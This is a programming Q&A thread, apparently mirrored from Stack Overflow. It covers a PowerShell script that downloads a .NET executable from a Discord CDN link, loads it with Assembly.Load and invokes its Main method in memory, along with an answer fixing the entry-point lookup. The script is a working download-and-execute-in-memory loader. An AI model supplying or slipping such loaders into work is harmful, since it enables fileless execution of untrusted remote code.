You cannot call a method on a null-valued expression. Powershell-CodePudding

Hello i found this code for execute .NET exe files in memory:

$ByteArray = (Invoke-WebRequest "https://cdn.discordapp.com/attachments/1033846522636410930/1036311327850901636/DOTNETcsharpErrorBox.exe").Content

# Base64
 
$Base64String = [System.Convert]::ToBase64String($ByteArray);
$PsEBytes = [System.Convert]::FromBase64String($Base64String)

# Run EXE in memory

$assembly = [System.Reflection.Assembly]::Load($PsEBytes)
# Get the static method that is the executable's entry point.
# Note: 
#   * Assumes 'Program' as the class name, 
#     and a static method named 'Main' as the entry point.
#   * Should there be several classes by that name, the *first* 
#     - public or non-public - type returned is used.
#     If you know the desired type's namespace, use, e.g.
#     $assembly.GetType('MyNameSpace.Program').GetMethod(...)

$entryPointMethod = 
 $assembly.GetTypes().Where({ $_.Name -eq 'Program' }, 'First').
   GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic')

# Now you can call the entry point.
# This example passes two arguments, 'foo' and 'bar'

$entryPointMethod.Invoke($null, (, [string[]] ('foo', 'bar')))

it works with .NET C# console application exe files but i tried a .NET C# form application exe file but it gives me this error:

You cannot call a method on a null-valued expression. At C:\Users\sadettin\Desktop\PE.ps1:30 char:1
$entryPointMethod.Invoke($null, (, [string[]] ('foo', 'bar')))
    CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    FullyQualifiedErrorId : InvokeMethodOnNull

But it works with a console application exe file!? its weird...

I think problem from this part: $entryPointMethod.Invoke($null, (, [string[]] ('foo', 'bar')))

What should i do or add to this code??? im new maybe there is a easy thing that i don't know

CodePudding user response：

Your symptom implies that variable $entryPointMethod contains $null, which in turn implies that the following call returned $null:

$assembly.GetTypes().Where({ $_.Name -eq 'Program' }, 'First').
  GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic')

This means that either no class named Program exists in the assembly or that it has no method named Main.

If your assembly has a command-line entry point, it does have a Main method, but not necessarily inside a Program class: while class name Program is common, a given application is free to choose a different one.

Also, Windows Forms applications typically do not accept command-line arguments, so even if you identify the correct method, an invocation such as $entryPointMethod.Invoke($null, (, [string[]] ('foo', 'bar'))) may fail.

Therefore, try the following:

# Find ANY 'Main' method, regardless of the name of the class it is a part of.
$entryPointMethod = 
  @(
    $assembly.GetTypes().GetMethod(
      'Main', 
      [Reflection.BindingFlags] 'Static, Public, NonPublic'
    )
  ) -ne $null

if ($null -eq $entryPointMethod) {
  throw "No 'Main' method found; the assembly doesn't have a CLI entry point."
} elseif ($entryPointMethod.Count -gt 1) {
  throw "MULTIPLE 'Main' methods found."
}

# Now you can call the entry point, without arguments in this example.
$entryPointMethod.Invoke($null, $null)